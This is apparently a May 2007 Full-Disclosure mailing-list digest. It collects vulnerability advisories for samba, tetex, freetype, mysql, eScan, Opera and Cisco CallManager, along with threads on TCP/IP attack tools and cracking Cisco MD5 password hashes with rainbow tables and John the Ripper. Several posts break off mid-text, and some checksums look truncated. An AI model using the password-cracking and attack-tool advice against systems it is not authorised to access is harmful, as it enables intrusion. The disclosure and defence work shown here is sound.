[Full-disclosure] [ MDKSA-2007:104-1 ] - Updated samba packages fix multiple vulnerabilities

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory   MDKSA-2007:104-1
 http://www.mandriva.com/security/
 ___
 
 Package : samba
 Date: May 23, 2007
 Affected: 2007.0, 2007.1
 ___
 
 Problem Description:
 
 A number of bugs were discovered in the NDR parsing support in Samba
 that is used to decode MS-RPC requests.  A remote attacker could
 send a carefully crafted request that would cause a heap overflow,
 possibly leading to the ability to execute arbitrary code on the server
 (CVE-2007-2446).
 
 A remote authenticated user could trigger a flaw where unescaped
 user input parameters were being passed as arguments to /bin/sh
 (CVE-2007-2447).
 
 Finally, on Samba 3.0.23d and higher, when Samba translated SID to/from
 name using the Samba local list of user and group accounts, a logic
 error in smbd's internal security stack could result in a transition
 to the root user id rather than the non-root user (CVE-2007-2444).

 Update:

 The fix for CVE-2007-2444 broke the behaviour of force group when
 the forced group is a local Unix group for domain member servers.
 
 This update corrects that regression.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2444
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 2ba4a54f7c3ea9fa3e7d716b78a9ccf3  
2007.0/i586/libsmbclient0-3.0.23d-2.3mdv2007.0.i586.rpm
 8d5cd8a8d91808cf5b28173399a4dccd  
2007.0/i586/libsmbclient0-devel-3.0.23d-2.3mdv2007.0.i586.rpm
 2afc7a841894a7d1ec6a10e43be56cb3  
2007.0/i586/libsmbclient0-static-devel-3.0.23d-2.3mdv2007.0.i586.rpm
 862bcb6362c116f547bcbb34c32d7382  
2007.0/i586/mount-cifs-3.0.23d-2.3mdv2007.0.i586.rpm
 153b0bb5e27b67e8bae513774b25d4fb  
2007.0/i586/nss_wins-3.0.23d-2.3mdv2007.0.i586.rpm
 29d1b0a886865dd4f7d23f0cf47d754c  
2007.0/i586/samba-client-3.0.23d-2.3mdv2007.0.i586.rpm
 c0df231352bf46e322ad1ff8805ba25a  
2007.0/i586/samba-common-3.0.23d-2.3mdv2007.0.i586.rpm
 4870de87bdf5da9e6b056ffbe55a95aa  
2007.0/i586/samba-doc-3.0.23d-2.3mdv2007.0.i586.rpm
 f8c445732224a5c8db8b3765737ecf09  
2007.0/i586/samba-server-3.0.23d-2.3mdv2007.0.i586.rpm
 a15627b69d8c7865473257aa71475a41  
2007.0/i586/samba-smbldap-tools-3.0.23d-2.3mdv2007.0.i586.rpm
 28271a81e11470645e1b8287c755a4c3  
2007.0/i586/samba-swat-3.0.23d-2.3mdv2007.0.i586.rpm
 26eb7109048d443c280244c8c871b6c4  
2007.0/i586/samba-vscan-clamav-3.0.23d-2.3mdv2007.0.i586.rpm
 fdd8e8f3a9d098a75c6517098f7a4e5f  
2007.0/i586/samba-vscan-icap-3.0.23d-2.3mdv2007.0.i586.rpm
 e16d790fdd80e78b1ad0c796b3fc62f0  
2007.0/i586/samba-winbind-3.0.23d-2.3mdv2007.0.i586.rpm 
 9725d3da0b4394c46c5a11718b02681c  
2007.0/SRPMS/samba-3.0.23d-2.3mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 5a40a67af7bddbac6f1a12ccc04eb71a  
2007.0/x86_64/lib64smbclient0-3.0.23d-2.3mdv2007.0.x86_64.rpm
 c2d3958fb241f8425a6c4b471a7e9ff0  
2007.0/x86_64/lib64smbclient0-devel-3.0.23d-2.3mdv2007.0.x86_64.rpm
 d896b8848adf231e7ca9732cedd1df14  
2007.0/x86_64/lib64smbclient0-static-devel-3.0.23d-2.3mdv2007.0.x86_64.rpm
 5bb35783003fb0598a1c8d004f1b7e89  
2007.0/x86_64/mount-cifs-3.0.23d-2.3mdv2007.0.x86_64.rpm
 936b0b4727ced4c51487d22eb4c728c2  
2007.0/x86_64/nss_wins-3.0.23d-2.3mdv2007.0.x86_64.rpm
 697a37f58cd7ee86bcb6d25fe5ce99a4  
2007.0/x86_64/samba-client-3.0.23d-2.3mdv2007.0.x86_64.rpm
 a2c89ccbb926ab10134bb6c08de1e708  
2007.0/x86_64/samba-common-3.0.23d-2.3mdv2007.0.x86_64.rpm
 a4f423f84d2de83ce0e08f7617c93dd7  
2007.0/x86_64/samba-doc-3.0.23d-2.3mdv2007.0.x86_64.rpm
 7f95a390b3d8a8f50b4ed74b5cd1  
2007.0/x86_64/samba-server-3.0.23d-2.3mdv2007.0.x86_64.rpm
 46d3c6533ebd7bee01721ca614e955ca  
2007.0/x86_64/samba-smbldap-tools-3.0.23d-2.3mdv2007.0.x86_64.rpm
 ed30c61f6884f8b26187e6e3a9885a24  
2007.0/x86_64/samba-swat-3.0.23d-2.3mdv2007.0.x86_64.rpm
 e8ef3da7af8952bebd84406c4a638e39  
2007.0/x86_64/samba-vscan-clamav-3.0.23d-2.3mdv2007.0.x86_64.rpm
 559d43f9a8f2a8a361b11a97d437c321  
2007.0/x86_64/samba-vscan-icap-3.0.23d-2.3mdv2007.0.x86_64.rpm
 76963cced45f658ab0ad5412a5aa794b  
2007.0/x86_64/samba-winbind-3.0.23d-2.3mdv2007.0.x86_64.rpm 
 9725d3da0b4394c46c5a11718b02681c  
2007.0/SRPMS/samba-3.0.23d-2.3mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 2e8c595bb959e2acb3ae05b04e8387d5  
2007.1/i586/libsmbclient0-3.0.24-2.2mdv2007.1.i586.rpm
 f398435995e18d601ddb9dc1f1128129  
2007.1/i586/libsmbclient0-devel-3.0.24-2.2mdv2007.1.i586.rpm
 be221059ee4f4c8dd62f23f27b636943  
2007.1/i586/libsmbclient0-static-devel-3.0.24-2.2mdv2007.1.i586.rpm
 63989fd2a666fd804e93fb6de50faf79  
2007.1/i586/mount-cifs-3.0.24-2.2mdv2007.1.i586.rpm
 df903048b4ccde8195a48aa1c94993a1  
2007.1/i586/nss_wins-3.0.24-2.2m

Re: [Full-disclosure] TCP/IP vulnerability

[Andrew Farmer]

On 23 May 07, at 08:27, Mohit Kohli wrote:
> Thanks for the reply but have some concerns...
> 1)Tearn drop and land attack work on win 95 server,how to exploits  
> this vulnerability or its variant on windows 2000 or linux.

I don't know about Windows 2000, but Linux doesn't appear to have  
ever been affected by LAND, and Teardrop was protected against with  
2.0.32. Getting a kernel that old to run will be very difficult  
unless you've got a copy of some *really* old distribution handy.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TCP/IP vulnerability

[Mohit Kohli]

Ivan

Thanks for the reply but have some concerns...
1)Tearn drop and land attack work on win 95 server,how to exploits this 
vulnerability or its variant on windows 2000 or linux.

Do we have any other vulnerability in TCP/IP apart of listed below...


Cheers,

Mohit 
-Original Message-
From: Ivan . [mailto:[EMAIL PROTECTED]
Sent: Wed 5/23/2007 5:34 AM
To: Mohit Kohli
Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]; 
[EMAIL PROTECTED]
Subject: Re: [Full-disclosure] TCP/IP vulnerability
 
dude, check out Fernando Gont site

http://www.gont.com.ar/tools/icmp-attacks/index.html

cheers
Ivan

On 5/22/07, Mohit Kohli <[EMAIL PROTECTED]> wrote:
>
>
>
>
> Hi Guys,
>
>
>
> I got an assignment to write a white paper on TCP/IP and to show demo on how 
> to exploits the same.
>
>
>
> I have listed some of the vulnerability, but need some good tools (preferably 
> windows based) to exploit the vulnerability and to perform further analysis.
>
>
>
> overlapping IP fragments
> Tear Drop
> Land
> SYN Attack
> Ping Flooding
> IP Spoofing
>
> SYN Guessing
>
> Smurf Attack
>
> Source Routing
> TCP Hijacking
>
> Man-in-the-Middle Attack
>
>
>
> I will appreciate; if you could provide me some inputs with regards to tools 
> to exploits the vulnerability.
>
>
>
> Cheers
>
>
>
> Mohit
>
>
>
>
>
>
> 
>
>  Disclaimer:
>
>  This message and the information contained herein is proprietary and 
> confidential and subject to the Tech Mahindra policy statement, you may 
> review at http://www.techmahindra.com/Disclaimer.html externally and 
> http://tim.techmahindra.com/Disclaimer.html internally within Tech Mahindra.
>
>  
> 
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>




 
Disclaimer:

This message and the information contained herein is proprietary and 
confidential and subject to the Tech Mahindra policy statement, you may review 
at http://www.techmahindra.com/Disclaimer.html";>http://www.techmahindra.com/Disclaimer.html
 externally and http://tim.techmahindra.com/Disclaimer.html";>http://tim.techmahindra.com/Disclaimer.html
 internally within Tech Mahindra.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] rPSA-2007-0108-1 freetype

[rPath Update Announcements]

rPath Security Advisory: 2007-0108-1
Published: 2007-05-23
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
freetype=/[EMAIL PROTECTED]:devel//1/2.1.10-5.2-1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2754
https://issues.rpath.com/browse/RPL-1390

Description:
Previous versions of the freetype package are vulnerable to an integer
overflow condition when processing malformed TTF fonts, possibly leading
to a heap overflow and executing arbitrary, attacker-provided code.

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] rPSA-2007-0107-1 mysql mysql-bench mysql-server

[rPath Update Announcements]

rPath Security Advisory: 2007-0107-1
Published: 2007-05-23
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Local User Deterministic Denial of Service
Updated Versions:
mysql=/[EMAIL PROTECTED]:devel//1/5.0.41-2-0.1
mysql-bench=/[EMAIL PROTECTED]:devel//1/5.0.41-2-0.1
mysql-server=/[EMAIL PROTECTED]:devel//1/5.0.41-2-0.1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2583
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1420
https://issues.rpath.com/browse/RPL-1127
https://issues.rpath.com/browse/RPL-1356

Description:
Previous versions of the mysql package are vulnerable to two
authenticated-user denial of service attacks in which specially crafted
queries can be used to crash the server.

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Secunia Research: eScan Products Agent Service Command Decryption Buffer Overflow

[Secunia Research]

== 

 Secunia Research 23/05/2007

 - eScan Products Agent Service Command Decryption Buffer Overflow -

== 
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

== 
1) Affected Software 

* eScan 9.0.715.1

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Moderately critical
Impact: System compromise
Denial of Service
Where:  Local network

== 
3) Vendor's Description of Software 

"eScan is the latest offering from MicroWorld Technologies Inc. It
offers a combination of features to help you fight the threat of
viruses, set security policies for parental control over content
accessed by your child. It guards against Internet misuse, block Spam
and offensive mails and block PopUp Ads.".

Product Link:
http://www.mwti.net/products/escan/escan.asp

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in various eScan
products, which may be exploited by malicious people to compromise a
vulnerable system.

The vulnerability is caused due to a boundary error in the MicroWorld
Agent service (MWAGENT.EXE) when decrypting received commands. This can
be exploited to cause a stack-based buffer overflow via an overly long
command sent to the service (default port /tcp).

Successful exploitation may allow execution of arbitrary code with
SYSTEM privileges.

== 
5) Solution 

Update to version 9.0.718.1 or later.

== 
6) Time Table 

10/05/2007 - Vendor notified.
10/05/2007 - Vendor response.
16/05/2007 - Vendor provides fixed version.
23/05/2007 - Public disclosure.

== 
7) Credits 

Discovered by Carsten Eiram, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2007-2687 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/ 

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2007-54/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cisco CallManager 4.1 Input ValidationVulnerability

[Mark-David McLaughlin (marmclau)]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Hi Stefan,

In their advisory below, Marc and Stefan illustrate how to bypass the
web
application firewall used in Cisco CallManager. This means of bypass can
be
used to display graphics, scripts, or other information downloaded from
an
external web site. This technique may also be used to conduct cross-site
scripting attacks. Cisco confirms that the example the authors provided
bypasses the web application firewall and that there may be other
methods
for bypassing the web application firewall.

Cisco has made improvements to the input validation mechanisms in
CallManager that may mitigate the risks associated with this security
vulnerability. These improvements have been incorporated into 4.2(3)sr2.
Future releases, 3.3(5)sr3, 4.1(3)sr5 and 4.3(1)sr1, will also include
the
improvements made to address this bug. This issue is being tracked by
the
following Cisco Bug ID:

  * CSCsi12374 - Improvements in User Input Validation

Service releases of CallManager software are available at the following
link:

http://www.cisco.com/public/sw-center/sw-voice.shtml

Additional Information
==

Cisco CallManager is the software-based call-processing component of the
Cisco IP telephony solution that extends enterprise telephony features
and
functions to packet telephony network devices, such as IP phones, media
processing devices, voice-over-IP (VoIP) gateways, and multimedia
applications. The vulnerability described in this response exists in the
web application firewall used in CallManager. This feature is designed
to
prevent users from entering malicious code into the input fields used in
CallManager forms. The vulnerability exists because the web application
firewall fails to properly sanitize some potentially malicious tags.

To exploit these issues an attacker must convince an authenticated user
to
follow a specially crafted, malicious URL. A successful attack may
result
in the execution of arbitrary script code in the user's web browser.

For additional information on cross-site scripting (XSS) attacks and the
methods used to exploit such vulnerabilities, please refer to the Cisco
Applied Intelligence Response "Understanding Cross-Site Scripting (XSS)
Threat Vectors," which is available at the following link:

http://www.cisco.com/en/US/products/ps6120/tsd_products_security_respons
e09
186a008073f7b3.html

The Cisco PSIRT is not aware of any malicious use of the vulnerability
described in this document.

We would like to thank Marc Ruef and Stefan Friedi for bringing this
issue
to our attention and for working with us toward coordinated disclosure
of
the issue. We greatly appreciate the opportunity to work with
researchers
on security vulnerabilities, and welcome the opportunity to review and
assist in product reports.

Cheers,

Mark-David McLaughlin
Product Security Incident Response Team (PSIRT) Cisco Systems, Inc.

- - -Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Stefan
Friedli
Sent: Wednesday, May 23, 2007 10:11 AM
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: [Full-disclosure] Cisco CallManager 4.1 Input
ValidationVulnerability

Cisco CallManager 4.1 Input Validation Vulnerability

scip AG Vulnerability ID 2977 (03/13/2007)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2977

I. INTRODUCTION

Cisco CallManager, short CCM, is a professional voice-over-IP solution
that tracks active components, including among others phones, gateways,
conference bridges, transcoding resources and voicemail boxes.

II. DESCRIPTION

Marc Ruef and Stefan Friedli found a web-based vulnerability that was
identified in Cisco CallManager 4.1 and may affect earlier versions as
well.

The web interface of the application fails to properly santisize data
supplied by the search-form before displaying it back to the user.
Though several filters are in place to prevent the injection of 

[Full-disclosure] [ MDKSA-2007:109 ] - Updated tetex packages fix vulnerabilities

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:109
 http://www.mandriva.com/security/
 ___
 
 Package : tetex
 Date: May 23, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 Buffer overflow in the gdImageStringFTEx function in gdft.c in the
 GD Graphics Library 2.0.33 and earlier allows remote attackers to
 cause a denial of service (application crash) and possibly execute
 arbitrary code via a crafted string with a JIS encoded font.
 
 Tetex 3.x uses an embedded copy of the gd source and may also be
 affected by this issue (CVE-2007-0455).
 
 A buffer overflow in the open_sty function for makeindex in Tetex
 could allow user-assisted remote attackers to overwrite files and
 possibly execute arbitrary code via a long filename (CVE-2007-0650).
 
 The updated packages have been patched to prevent these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0455
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0650
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 f2fb0b9d245e499e2fc1138a038b3e7c  
2007.0/i586/jadetex-3.12-116.2mdv2007.0.i586.rpm
 9837dfed443636fd08b9e375204d22f3  2007.0/i586/tetex-3.0-18.2mdv2007.0.i586.rpm
 d4973051015bd0e48b89934f73fd5897  
2007.0/i586/tetex-afm-3.0-18.2mdv2007.0.i586.rpm
 b1fd20a365cb89f9adbb056957800730  
2007.0/i586/tetex-context-3.0-18.2mdv2007.0.i586.rpm
 13ee210196e3f1c0e997e50520e04168  
2007.0/i586/tetex-devel-3.0-18.2mdv2007.0.i586.rpm
 e90f6b31569572defb05df637b47256b  
2007.0/i586/tetex-doc-3.0-18.2mdv2007.0.i586.rpm
 e5059f0d5fbcbe39514080c402403668  
2007.0/i586/tetex-dvilj-3.0-18.2mdv2007.0.i586.rpm
 ea99b66036aae65ebd4dc61c926371c2  
2007.0/i586/tetex-dvipdfm-3.0-18.2mdv2007.0.i586.rpm
 6ad19d54b5ffb9f36d89e25543614d6a  
2007.0/i586/tetex-dvips-3.0-18.2mdv2007.0.i586.rpm
 2ed6744049834e1b5571c014039cad73  
2007.0/i586/tetex-latex-3.0-18.2mdv2007.0.i586.rpm
 68710a0017149bab9bd9c45e72500e4d  
2007.0/i586/tetex-mfwin-3.0-18.2mdv2007.0.i586.rpm
 e86f54a2dd0c686181b5095612dd36e6  
2007.0/i586/tetex-texi2html-3.0-18.2mdv2007.0.i586.rpm
 52cefb34a64cb9153f2089e01c1c41a3  
2007.0/i586/tetex-xdvi-3.0-18.2mdv2007.0.i586.rpm
 8ee8896d09ee50dcb43dfafb27af7450  
2007.0/i586/xmltex-1.9-64.2mdv2007.0.i586.rpm 
 7332b25d4445a16a6e8cf7dde312f8b3  2007.0/SRPMS/tetex-3.0-18.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 bd2a21204202fc7101a14cd843dc6675  
2007.0/x86_64/jadetex-3.12-116.2mdv2007.0.x86_64.rpm
 18a2ebd864bda026ed9deae0260f2c6a  
2007.0/x86_64/tetex-3.0-18.2mdv2007.0.x86_64.rpm
 08674c2aaf3dc4e64d79e356351b16ec  
2007.0/x86_64/tetex-afm-3.0-18.2mdv2007.0.x86_64.rpm
 099958867b65722546ff5616168d353b  
2007.0/x86_64/tetex-context-3.0-18.2mdv2007.0.x86_64.rpm
 ab7b5ddd7032163f9538cbfeb972c36f  
2007.0/x86_64/tetex-devel-3.0-18.2mdv2007.0.x86_64.rpm
 80d8c28897a373290a3e7da9e7450049  
2007.0/x86_64/tetex-doc-3.0-18.2mdv2007.0.x86_64.rpm
 25b68b1ec84b71b41670441bd14e3662  
2007.0/x86_64/tetex-dvilj-3.0-18.2mdv2007.0.x86_64.rpm
 1145106d1b43d66780ef9e5fbf7b41e0  
2007.0/x86_64/tetex-dvipdfm-3.0-18.2mdv2007.0.x86_64.rpm
 6a7f1c5b69eec1d6dc909d1a4bd60e62  
2007.0/x86_64/tetex-dvips-3.0-18.2mdv2007.0.x86_64.rpm
 99fb2ba27ba3ee62627f98e3a293961a  
2007.0/x86_64/tetex-latex-3.0-18.2mdv2007.0.x86_64.rpm
 8fd128897ea8795205e09e26df2d9936  
2007.0/x86_64/tetex-mfwin-3.0-18.2mdv2007.0.x86_64.rpm
 f8d9a6b42f6ac0e8cbbe49db185683aa  
2007.0/x86_64/tetex-texi2html-3.0-18.2mdv2007.0.x86_64.rpm
 dcbdb99c0cb719fdf46462266b8c0b1b  
2007.0/x86_64/tetex-xdvi-3.0-18.2mdv2007.0.x86_64.rpm
 9d4136876004296084b2e8901ba8  
2007.0/x86_64/xmltex-1.9-64.2mdv2007.0.x86_64.rpm 
 7332b25d4445a16a6e8cf7dde312f8b3  2007.0/SRPMS/tetex-3.0-18.2mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 b0c390f76cf5b5345d5c09ca69d3c059  
2007.1/i586/jadetex-3.12-129.1mdv2007.1.i586.rpm
 5ee999211c58309118a09d98cc334711  2007.1/i586/tetex-3.0-31.1mdv2007.1.i586.rpm
 824ed1c03ce87ed9735d918badd463c3  
2007.1/i586/tetex-afm-3.0-31.1mdv2007.1.i586.rpm
 d26541171e2d048cce9b708bd75771ad  
2007.1/i586/tetex-context-3.0-31.1mdv2007.1.i586.rpm
 81c9101b8ff1c83ce091be00328ec0ba  
2007.1/i586/tetex-devel-3.0-31.1mdv2007.1.i586.rpm
 c14a60cccb6b00a8f3df515b7640d7b7  
2007.1/i586/tetex-doc-3.0-31.1mdv2007.1.i586.rpm
 cae0f034ff475c0ba70cf02a2a977ba6  
2007.1/i586/tetex-dvilj-3.0-31.1mdv2007.1.i586.rpm
 b4c68dbaed85af6334e1716d83327d2b  
2007.1/i586/tetex-dvipdfm-3.0-31.1mdv2007.1.i586.rpm
 377f9fd4e3ad4ef7fa64a93b34c2a93b  
2007.1/i586/tetex-dvips-3.0-31.1mdv2007.1.i586.rpm
 5a80c5a2bded8b079d136a07ddba8860  
2007.1/i586/tetex-l

[Full-disclosure] FLEA-2007-0020-1: freetype

[Foresight Linux Essential Announcement Service]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0020-1
Published: 2007-05-21

Rating: Moderate

Updated Versions:

freetype=/[EMAIL PROTECTED]:devel//1//[EMAIL PROTECTED]:1-devel//1/2.3.4-0.0.1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.2.2-0.9-2

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2754
https://issues.rpath.com/browse/RPL-1390

Description:
Previous versions of the freetype package were vulnerable to an issue
whereby a specially crafted ttf file could execute arbitrary code at the
permission level of the use running freetype.

- ---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html

-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.4 (GNU/Linux)

iD8DBQFGVOQM0e1Yawpq2XMRAnNxAJoDOx4XRU3wxiZBOlfdyAZ7apNGHQCgr95M
fI0WnsEw5rvfIY+lGJ4OgtA=
=ELOg
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Rainbow tables and Oracle SYSTEM salt

[coderman]

speaking of bad salts, i haven't seen any tables for oracle SYSTEM
user.  i know at one point the "lack of fix" was deterring some from
release, but that was two years ago.  perhaps oracle needs a stronger
incentive.

rumors of patches / table generators abound; are people just keeping
these private?

full disclosure++

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Enable secret 5 : Cisco Password

[coderman]

On 5/23/07, coderman <[EMAIL PROTECTED]> wrote:
> ... for example, lanman is a great target
> - it uses md5, but does not salt.

er, this should be MD4 or DES, depending on version.  mea culpa...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Enable secret 5 : Cisco Password

[coderman]

On 5/23/07, Michael Holstein <[EMAIL PROTECTED]> wrote:
> > Dork, show me a full set of a-zA-Z0-9{8} rainbow tables with salted
> > md5 and I will show you a picture of me in a bathing suit.
>
> My *point* was that a rainbow attack against is a lot faster than a
> brute-force with JTR or similar. Might as well try the easier options first.

what Knud was indicating is that rainbow tables work against unsalted
(or minimally salted) targets.  for example, lanman is a great target
- it uses md5, but does not salt.  if you have 200G to spare, this
works great.

properly salted md5 is immune to rainbow table attacks.

(now, as for generating collisions, there have been some nice advances
in md5 tunneling attacks, but the cost is still too large for targeted
md5 collisions iirc.  someone will correct me if i'm wrong, i'm
sure...)

best regards,

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [tech-geeks] OT: Local computer shop is getting sued by NBA Spurs player (fwd)

[Jay Sulzberger]

-- Forwarded message --
  Date: Wed, 23 May 2007 15:32:47 -0500
  From: Aaron Hackney <[EMAIL PROTECTED]>
  Reply-To: [EMAIL PROTECTED]
  To: [EMAIL PROTECTED]
  Subject: [tech-geeks] OT: Local computer shop is getting sued by NBA Spurs
  player

  As many of you may or not know, the Spurs are a big deal here in San
  Antonio. (GO SPURS GO!)
  Anyhow, one of the stars of the Spurs is suing a local computer shop
  for $2 mil.

  http://www.thesmokinggun.com/archive/years/2007/0501071bowen1.html

  From what I understand.
  They used an off the shelf hard drive to ghost his PC, install a new
  drive and then ghost the image back to the pc. They then accidentally
  sold that hard disk in a pc to some lady. She notices there is stuff
  already on the disk. Opens up my documents and there is a TON of
  personal info on this millionaire nba star

  From what I understand, it's bad charma coming back to haunt this
  company. everyone on a different list-serv that I am on has nothing but
  bad things to say about them, including former employees :P


  -
  To unsubscribe, e-mail: [EMAIL PROTECTED]
  For additional commands, e-mail: [EMAIL PROTECTED]


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Enable secret 5 : Cisco Password

[Michael Holstein]

> Dork, show me a full set of a-zA-Z0-9{8} rainbow tables with salted
> md5 and I will show you a picture of me in a bathing suit.

My *point* was that a rainbow attack against is a lot faster than a 
brute-force with JTR or similar. Might as well try the easier options first.

Of course, if the router is "in hand" it's even easier still to reboot 
it into ROMmon and reset the config register, but that's not what the OP 
asked.

~Mike.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Enable secret 5 : Cisco Password

[Knud Erik Højgaard]

WOW, another unknowing CISSP (is this available via some e-school?) ,
and GCIA as well, I am baffled!!

Dork, show me a full set of a-zA-Z0-9{8} rainbow tables with salted
md5 and I will show you a picture of me in a bathing suit.


> I'd suggest checking against one of the many public rainbow tables first
> though. Remember, with a hash, you need not figure out the actual
> password, just something that generates a collision.
>
> Cheers,
>
> Michael Holstein CISSP GCIA
> Cleveland State University <- student obviously.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Enable secret 5 : Cisco Password

[Michael Holstein]

> Since it's an MD5 password, you would need quite a bit of processing 
> power, maybe put the hash up on milw0rm?

Well, that depends on how long/complex the password is. Using djohn and 
several CPUs would increase efficiency substantially.

I'd suggest checking against one of the many public rainbow tables first 
though. Remember, with a hash, you need not figure out the actual 
password, just something that generates a collision.

Cheers,

Michael Holstein CISSP GCIA
Cleveland State University

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 05.23.07: Opera Software Opera Web Browser Transfer Item Pop-up Menu Stack Overflow Vulnerability

[iDefense Labs]

Opera Software Opera Web Browser Transfer Item Pop-up Menu Stack
Overflow Vulnerability

iDefense Security Advisory 05.23.07
http://labs.idefense.com/intelligence/vulnerabilities/
May 23, 2007

I. BACKGROUND

Opera is a cross-platform web browser. More information is available at
http://www.opera.com/

II. DESCRIPTION

Remote exploitation of a stack-based buffer overflow in Opera Software
ASA's Opera Web browser could allow an attacker to execute arbitrary
code on the affected host.

Opera 9.2 supports BitTorrent downloads. If a server sends the browser a
specially crafted BitTorrent header, it can lead to a buffer overflow.
The buffer overflow is triggered when the user right clicks on the item
in the download pane.

III. ANALYSIS

Exploitation of this vulnerability allows an attacker to execute
arbitrary code on the affected host.

The attacker must convince the vulnerable user into clicking a link to a
BitTorrent file.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in the Opera
version 9.2 for Windows. Previous versions may also be affected.

V. WORKAROUND

iDefense is not currently aware of a work around for this issue.

VI. VENDOR RESPONSE

Version 9.21 of Opera has been released to address this issue. More
information can be found at the following URL.

http://www.opera.com/support/search/view/860/

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

05/08/2007  Initial vendor notification
05/08/2007  Initial vendor response
05/23/2007  Coordinated public disclosure

